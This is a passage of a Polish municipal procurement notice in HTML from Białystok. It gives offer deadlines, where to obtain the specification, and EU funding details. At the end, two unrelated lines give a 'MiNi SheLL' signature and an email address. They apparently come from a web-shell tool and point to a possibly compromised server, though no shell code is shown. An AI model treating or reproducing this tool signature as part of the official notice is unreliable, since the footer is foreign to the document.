7. Warunkiem dokonania zmian, o których mowa w pkt 2-6, jest złożenie uzasadnionego wniosku przez stronę inicjującą zmiany wraz z opisem okoliczności stanowiących podstawę do dokonania takich zmian.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.bialystok.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Departament Gospodarki Komunalnej Urzędu Miejskiego w Białymstoku, ul. I Armi Wojska Polskiego 2/2, pok. 108.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.03.2016 godzina 11:45, miejsce: Urząd Miejski w Białymstoku, 15-103 Białystok, ul. I Armii Wojska Polskiego 2/2, pok.
nr 08.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com